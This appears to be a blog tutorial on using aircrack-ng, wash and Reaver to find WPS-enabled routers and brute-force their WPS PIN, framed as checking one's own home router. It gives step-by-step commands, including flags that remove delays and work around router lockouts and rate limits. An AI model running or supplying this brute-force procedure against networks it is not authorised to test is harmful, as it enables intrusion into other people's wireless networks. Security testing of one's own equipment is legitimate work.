WPS – How to install and use Reaver to detect the WPS on your home router
WPS was supposed to make security easier, alas it destroyed much of your security. Install Reaver to see what I mean.
Step 1 – Download Reaver
sudo apt-get install aircrack-ng reaver
Step 2 – Put your wireless card into “monitor mode”
Check wireless cards are detected. Are your cards detected?
sudo airmon-ng start wlan0
Step 3 – Find the Unique ID of your Router
Control + C – to stop airodump and be able to cut and paste the Basestation ID
Open a second root terminal
Step 4 – Use Wash to find WPS Routers
wash -i mon0
note if you get fcs errors (as shown)
wash-i mon0 –ignore-fcs
Step 5 – Start Reaver running against your Routers’ ID
Cut and paste the Basestation MAC from your first terminal
reaver -i mon0 -b AA:BB:CC:65:FF:B4 -vv
reaver -i mon0 (monitoring interface) You need to make wlan0 into mon0 to listen to all packets.
-b bssid (basestation Security ID) that you attacking. The BSSID is the MAC of the router. The ESSID is the human name for the router eg “useless or wobbly”.
-vv (very verbose)
Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP.
Step 6 – Useful Reaver commands for running against your Routers’ ID
By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface’s channel:
reaver -i mon0 -b 00:01:02:03:04:05 –fixed
The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
reaver -i mon0 -b 00:01:02:03:04:05 -t 2
The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:
reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Some APs will temporarily lock their WPS state, typically for five minutes or less, when “suspicious” activity is detected
reaver -i mon0 -b 00:01:02:03:04:05 –lock-delay=250
For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:
reaver -i mon0 -b 00:01:02:03:04:05 -vv
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:
reaver -i mon0 -b 00:01:02:03:04:05 –fail-wait=120
Additonal Info – Setting the exact Channel etc
“reaver -i mon0 -b (bssid) -vv -c (channel) -e (name of AP) -p (wps pin)
Step 7 – Background info on Wash
WPS is installed with using a push button on the router, or a PIN. WASH targets the Pin based WPS systems not the push button system.
Wash will only show access points that support WPS. Wash displays the following information for each discovered access point: BSSID The BSSID of the AP Channel The APs channel, as specified in the AP's beacon packet WPS Version The WPS version supported by the AP WPS Locked The locked status of WPS, as reported in the AP's beacon packet ESSID The ESSID of the AP However, wash can be instructed to send probe requests to each AP in order to obtain more information about the AP: wash -i mon0 --scan By sending probe requests, wash will illicit a probe response from each AP. For WPS-capable APs, the WPS information element typically contains additional information about the AP, including make, model, and version data. This data is stored in the survey table of the reaver.db database. http://reaver-wps.googlecode.com/svn/trunk/docs/README.WASH
How to fix airmon-ng errors in KALI 2.0
Which is the safest VPN on the market? Who do I use for a VPN?
Warrant Canary – can be found here:
Brute force hacking – But why do I have to disable the WPS pin on my home router?
WPS Flaw Vulnerable Devices – List of Router Models and whether vulnerable to WPS attacks
Select your router manufacturer, then model, the spreadsheet will tell you how many hours it will take to crack your router via WPS.